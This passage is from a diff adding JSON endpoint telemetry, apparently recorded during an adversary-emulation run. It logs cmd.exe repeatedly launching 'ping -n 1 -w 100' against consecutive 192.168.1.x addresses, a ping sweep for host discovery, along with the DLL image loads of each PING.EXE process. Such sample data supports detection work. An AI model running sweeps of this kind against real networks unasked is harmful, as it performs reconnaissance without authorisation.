"IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572146980000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "event_type": "process", + "pid": 2216, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572151840000, + "unique_pid": "{42FC7E13-CB5E-5C05-0000-0010D7C35101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.34", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5508, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572151980000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": 
"C:\\Windows\\System32\\PING.EXE", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572151990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "event_type": "process", + "pid": 5508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572156990000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-001046C65101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.35", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2504, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 
131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572157140000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "event_type": "process", + "pid": 2504, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572161830000, + "unique_pid": "{42FC7E13-CB5F-5C05-0000-0010C1C85101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.36", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572161980000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "event_type": "process", + 
"pid": 4592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572166990000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-001032CB5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.37", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3036, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572167150000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + 
"unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572167140000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "event_type": "process", + "pid": 3036, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572171830000, + "unique_pid": "{42FC7E13-CB60-5C05-0000-0010ACCD5101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.38", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5532, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": 
"{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572171980000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "event_type": "process", + "pid": 5532, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572176990000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-00101DD05101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.39", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5512, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177140000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572177300000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "event_type": "process", + "pid": 5512, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572181990000, + "unique_pid": "{42FC7E13-CB61-5C05-0000-001097D25101}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.40", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5276, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5276, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572182140000, + "unique_pid": "{42FC7E13-CB62-5C05-0000-001004D55101}" 